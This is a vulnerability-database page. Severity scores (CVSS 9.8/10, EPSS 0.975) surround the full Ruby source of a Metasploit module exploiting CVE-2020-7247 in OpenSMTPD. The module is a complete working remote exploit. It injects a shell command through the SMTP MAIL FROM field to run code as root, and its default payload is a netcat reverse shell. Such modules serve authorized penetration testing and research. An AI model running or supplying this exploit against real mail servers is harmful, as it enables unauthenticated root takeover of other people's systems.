9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
99.9%
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Expect
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the MAIL FROM field during
SMTP interaction with OpenSMTPD to execute code as the root user.
},
'Author' => [
'Qualys', # Discovery and PoC
'wvu', # Module
'RageLtMan <rageltman[at]sempervictus>' # Module
],
'References' => [
['CVE', '2020-7247'],
['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
],
'DisclosureDate' => '2020-01-28',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [
['OpenSMTPD >= commit a8e222352f',
'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
))
register_options([
Opt::RPORT(25),
OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
])
end
def check
connect
res = sock.get_once
return CheckCode::Unknown unless res
return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
CheckCode::Safe
rescue EOFError, Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
unless datastore['ForceExploit']
unless check == CheckCode::Detected
fail_with(Failure::Unknown, 'Set ForceExploit to override')
end
end
# We don't care who we are, so randomize it
me = rand_text_alphanumeric(8..42)
# Send mail to this valid recipient
to = datastore['RCPT_TO']
# Comment "slide" courtesy of Qualys - brilliant!
iter = rand_text_alphanumeric(15).chars.join(' ')
from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
# This is just insurance, since the code was already written
if from.length > 64
fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
elsif (badchars = (from.chars & target['MyBadChars'])).any?
fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
end
# Create the mail body with comment slide and payload
body = "\r\n" + "#\r\n" * 15 + payload.encoded
sploit = {
nil => /220.*OpenSMTPD/,
"HELO #{me}" => /250.*pleased to meet you/,
"MAIL FROM:<#{from}>" => /250.*Ok/,
"RCPT TO:<#{to}>" => /250.*Recipient ok/,
'DATA' => /354 Enter mail.*itself/,
body => nil,
'.' => /250.*Message accepted for delivery/,
'QUIT' => /221.*Bye/
}
print_status('Connecting to OpenSMTPD')
connect
print_status('Saying hello and sending exploit')
sploit.each do |line, pattern|
send_expect(
line,
pattern,
sock: sock,
timeout: datastore['ExpectTimeout'],
newline: "\r\n"
)
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error => e
fail_with(Failure::TimeoutExpired, e.message)
ensure
disconnect
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
99.9%